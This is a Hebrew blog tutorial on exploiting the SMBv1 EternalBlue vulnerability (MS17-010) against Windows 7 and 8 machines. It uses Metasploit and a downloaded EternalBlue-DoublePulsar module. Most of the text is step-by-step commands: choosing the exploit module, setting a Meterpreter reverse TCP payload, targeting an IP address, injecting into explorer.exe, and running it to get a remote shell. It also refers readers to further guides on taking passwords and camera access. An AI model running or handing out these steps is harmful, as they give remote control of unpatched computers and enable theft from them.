Home אבטחת מידעPenetration Testing - Offense ביצוע Exploit על תחנה ע”י שימוש בחולשת SMBv1 | EternalBlue

ביצוע Exploit על תחנה ע”י שימוש בחולשת SMBv1 | EternalBlue

by Tal Ben Shushan 27/01/2018 0 comment
ביצוע Exploit על תחנה ע”י שימוש בחולשת SMBv1 | EternalBlue

כל הזכויות שמורות לטל בן שושן – Shushan.co.il

ביצוע Exploit על תחנה ע”י שימוש בחולשת SMBv1 | EternalBlue


על מנת לבצע את המאמר, יש לעבור תחילה על המאמרים הבאים:
Kali & Metasploit

על מנת לבצע את המאמר, יש לעבור תחילה על המאמרים הבאים:
Kali & Metasploit

התקנת Kali 2017.3
הגדרה ראשונית של Kali והוספת Repository
הסבר הגדרה והפעלת Metasploit
פקודות ושימוש ב Metasploit


אחת ההתקפות המפורסמות ביותר שפורסמו בחדשות, עיתונים וכתבות, מתארות את החולשה ב SMBv1 כ Zero Day Attack , הNSA הם אלו שמצאו את הפריצה והשתמשו בה זמן רב עד שהודלפה ואז הפכה לנחת הכלל

הפריצה תוקפת את מנגנון ה SMBv1 וכן מחשבים שבהם נוטרל הפרוטוקול המיושן, במאמר זה ניתן לקרוא כיצד לבטל את SMBv1 על ידי GPO בארגון.

במדריך זה נראה כיצד להוריד את ה Exploit, לטעון אותו ל Metaspolit ואז לבצע Payload לתחנה ולראות שהצלחנו לתקוף את התחנה.

קיימים 2 דרכים לביצוע, האחת היא דרך הExploit הקיים ב Metasploit והשני הוא להוריד את Doublepulsar

נתחיל מהExploit הקיים ב Metasploit

נבצע את המאמר הסבר הגדרה והפעלת Metasploit

כעת נכנס ל msconsole ונגדיר בשימוש את ה ms17 EternalBlue

use exploit/windows/smb/ms17_010_eternalblue

כעת נגדיר Reverse TCP

set payload windows/x64/meterpreter/reverse_tcp

נגדיר את היעד שלנו, מחשב ווינדוס 7

set rhost 192.168.31.116

set lhost Your Ip Address

כעת נגדיר את הכתובת של Kali (במהלך המדריך השתנה הכתובת שלי, במקרה הזה הכתובת של הקאלי שלי היא 192.168.31.132)

נרשום exploit ונלחץ Enter!

הצלחנו לקבל Meterpter מלא, כעת תוכלו להיעזר במאמר הבא “פקודות ושימוש ב Metasploit
על מנת להבין כיצד להשיג סיסמאות,מצלמה וכו’

Eternalblue Doublepulsar Metasploit

הוא למעשה הרחבה של הExploit הקיים, ואיתו ניתן לבצע את החולשה גם על מערכות כמו Windows 8

תחילה נוריד את ה Exploit

https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

אתם לוחצים על clone or download ומורידים את כל הכיווץ

לאחר שהורדתם אותו יש להוציא אותו מכיווץ ואז לטעון אותו ב Kali לנתיב

*יש  להעתיק את קובץ ה .rb וגם את התיקייה deps אל הנתיב הבא

/usr/share/metasploit-framework/modules/exploits/windows/smb

נקליד

sudo msfconsole

כעת נקליד את הפקודה

root@kali~# use exploit/windows/smb/eternalblue_doublepulsar

כעת נגדיר לExploit את מיקומו

root@kali~# set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

וגם את הפקודה

root@kali~# set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

כעת נקיש את הפקודה

root@kali~# mkdir -p /root/.wine/drive_c/

ולאחר מכן נתקין את wine

sudo apt-get install winetricks

כעת נבצע עוד התקנה

sudo dpkg --add-architecture i386 && apt-get update && apt-get install wine32

כעת נבצע את הפקודה

sudo apt-get install wine32

כעת נגדיר

root@kali~# set processinject explorer.exe

אם המערכת שאתם תוקפים היא X64 יש להקיש את הפקודה

root@kali~# set payload windows/x64/meterpreter/reverse_tcp

כעת נקליד את המחשב שהוא היעד שאותו ננסה לתקוף

root@kali~# set rhost 192.168.1.160

ולאחר מכן run

sudo run

והופ יש לנו גישת Meterpreter

מה אפשר לעשות עם ההרשאות האלו? עברו על שאר המדריכים באתר !

מאמרים קשורים

Leave a Comment